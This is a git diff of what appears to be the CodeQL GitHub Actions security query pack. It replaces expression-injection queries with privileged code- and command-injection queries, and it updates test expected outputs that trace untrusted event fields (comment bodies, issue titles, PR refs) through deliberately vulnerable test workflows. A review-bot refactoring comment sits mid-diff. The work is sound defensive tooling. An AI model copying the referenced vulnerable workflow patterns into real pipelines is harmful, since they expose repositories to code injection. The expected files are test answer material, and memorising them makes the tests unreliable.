- w = source.getNode().asExpr().getEnclosingWorkflow() and
- (
- w instanceof ReusableWorkflow or
- w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
- )
-select sink.getNode(), source, sink,
- "Potential critical code injection in $@, which may be controlled by an external user.", sink,
- sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql
deleted file mode 100644
index e24b1ab9ddc0..000000000000
--- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql
+++ /dev/null
@@ -1,48 +0,0 @@
-/**
- * @name Expression injection in Actions
- * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious
- * user to inject code into the GitHub action.
- * @kind path-problem
- * @problem.severity error
- * @security-severity 9
- * @precision high
- * @id actions/critical-expression-injection
- * @tags actions
- * security
- * external/cwe/cwe-094
- */
-
-import actions
-import codeql.actions.DataFlow
-import codeql.actions.TaintTracking
-import codeql.actions.dataflow.FlowSources
-import codeql.actions.dataflow.ExternalFlow
-
-private class ExpressionInjectionSink extends DataFlow::Node {
- ExpressionInjectionSink() {
- exists(Run e | e.getAnScriptExpr() = this.asExpr()) or
- externallyDefinedSink(this, "expression-injection")
- }
-}
-
-private module MyConfig implements DataFlow::ConfigSig {
- predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
-
- predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink }
-}
-
-module MyFlow = TaintTracking::Global;
-
-import MyFlow::PathGraph
-
-from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w
-where
- MyFlow::flowPath(source, sink) and
- w = source.getNode().asExpr().getEnclosingWorkflow() and
- (
- w instanceof ReusableWorkflow or
- w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
- )
-select sink.getNode(), source, sink,
- "Potential expression injection in $@, which may be controlled by an external user.", sink,
- sink.getNode().asExpr().(Expression).getExpression()
diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql
deleted file mode 100644
index 1e7414e5ce6d..000000000000
--- a/ql/src/Security/CWE-094/ExpressionInjection.ql
+++ /dev/null
@@ -1,42 +0,0 @@
-/**
- * @name Expression injection in Actions
- * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious
- * user to inject code into the GitHub action.
- * @kind path-problem
- * @problem.severity warning
- * @security-severity 5.0
- * @precision high
- * @id actions/expression-injection
- * @tags actions
- * security
- * external/cwe/cwe-094
- */
-
-import actions
-import codeql.actions.DataFlow
-import codeql.actions.TaintTracking
-import codeql.actions.dataflow.FlowSources
-import codeql.actions.dataflow.ExternalFlow
-
-private class ExpressionInjectionSink extends DataFlow::Node {
- ExpressionInjectionSink() {
- exists(Run e | e.getAnScriptExpr() = this.asExpr()) or
- externallyDefinedSink(this, "expression-injection")
- }
-}
-
-private module MyConfig implements DataFlow::ConfigSig {
- predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
-
- predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink }
-}
-
-module MyFlow = TaintTracking::Global;
-
-import MyFlow::PathGraph
-
-from MyFlow::PathNode source, MyFlow::PathNode sink
-where MyFlow::flowPath(source, sink)
-select sink.getNode(), source, sink,
- "Potential expression injection in $@, which may be controlled by an external user.", sink,
- sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql
new file mode 100644
index 000000000000..69ab240616e6
--- /dev/null
+++ b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql
@@ -0,0 +1,31 @@
+/**
+ * @name Code injection on a privileged context
+ * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary
+ * code execution.
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 9
+ * @precision high
+ * @id actions/privileged-code-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-094
+ * external/cwe/cwe-095
+ * external/cwe/cwe-116
+ */
+
+import actions
+import codeql.actions.security.CodeInjectionQuery
+import CodeInjectionFlow::PathGraph
+
+from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Workflow w
+where
+ CodeInjectionFlow::flowPath(source, sink) and
+ w = source.getNode().asExpr().getEnclosingWorkflow() and
+ (
+ w instanceof ReusableWorkflow or
+ w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
+ )
+select sink.getNode(), source, sink,
+ "Potential privileged code injection in $@, which may be controlled by an external user.", sink,
+ sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql
index 228c94f383b9..3700201c3152 100644
--- a/ql/src/Security/CWE-918/RequestForgery.ql
+++ b/ql/src/Security/CWE-918/RequestForgery.ql
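Review bot: The privileged-context condition (`w = source.getNode().asExpr().getEnclosingWorkflow()` and the `ReusableWorkflow`/`hasTriggerEvent` disjunction) is copied verbatim from PrivilegedCommandInjection.ql in this same commit, and the deleted Critical* queries show it had already been duplicated three times before. Since the commit hoists the flow configurations into shared `codeql.actions.security.*Query` modules, this condition should move with them as one predicate, e.g. `predicate inPrivilegedContext(DataFlow::Node source)` holding the three-line body, so the two queries cannot drift on what "privileged" means. The query would then reduce to `where CodeInjectionFlow::flowPath(source, sink) and inPrivilegedContext(source.getNode())` with `Workflow w` dropped from the `from` clause. The `@description` is also word-for-word the unprivileged query's; it should say that the injected code runs in a workflow with a write token or secrets, which is the whole reason this query carries the higher severity.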
@@ -12,27 +12,11 @@
 */
 import actions
-import codeql.actions.DataFlow
-import codeql.actions.TaintTracking
-import codeql.actions.dataflow.FlowSources
-import codeql.actions.dataflow.ExternalFlow
+import codeql.actions.security.RequestForgeryQuery
+import RequestForgeryFlow::PathGraph
-private class RequestForgerySink extends DataFlow::Node {
- RequestForgerySink() { externallyDefinedSink(this, "request-forgery") }
-}
-
-private module MyConfig implements DataFlow::ConfigSig {
- predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
-
- predicate isSink(DataFlow::Node sink) { sink instanceof RequestForgerySink }
-}
-
-module MyFlow = TaintTracking::Global;
-
-import MyFlow::PathGraph
-
-from MyFlow::PathNode source, MyFlow::PathNode sink
-where MyFlow::flowPath(source, sink)
+from RequestForgeryFlow::PathNode source, RequestForgeryFlow::PathNode sink
+where RequestForgeryFlow::flowPath(source, sink)
 select sink.getNode(), source, sink,
 "Potential request forgery in $@, which may be controlled by an external user.", sink,
 sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref
deleted file mode 100644
index ceb027c8058d..000000000000
--- a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref
+++ /dev/null
@@ -1 +0,0 @@
-Security/CWE-078/CriticalCommandInjection.ql
diff --git a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected
similarity index 58%
rename from ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected
rename to ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected
index 8a3d19402b7c..13d146a2570f 100644
--- a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected
+++ b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected @@ -3,4 +3,4 @@ nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential critical command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential privileged command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref new file mode 100644 index 000000000000..2c7cc5c5fde0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref @@ -0,0 +1 @@ +Security/CWE-078/PrivilegedCommandInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 4ef832d9d22e..23e502567561 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
@@ -1,14 +1,286 @@ edges +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | +| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | +| 
.github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs 
node [job_output] | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | 
.github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | 
+| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | +| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | +| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | nodes +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | +| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | 
github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | +| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | +| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message 
| semmle.label | env.pr_message | +| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | semmle.label | github.event.pages[1].title | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | semmle.label | github.event.pages[11].title | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | semmle.label | github.event.pages[0].page_name | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | semmle.label | github.event.pages[2222].page_name | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | semmle.label | 
steps.extract-url.outputs.initial_url | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | semmle.label | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | semmle.label | steps.trim-url.outputs.trimmed_url | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| 
.github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env 
| semmle.label | env.global_env | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | semmle.label | github.event.review.body | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | 
github.event.pull_request.head.label | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_target.yml:14:19:14:69 | 
github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | semmle.label | github.head_ref | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | semmle.label | github.event.commits[11].message | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | semmle.label | github.event.commits[11].author.email | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | semmle.label | github.event.commits[11].author.name | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | semmle.label | github.event.head_commit.author.email | 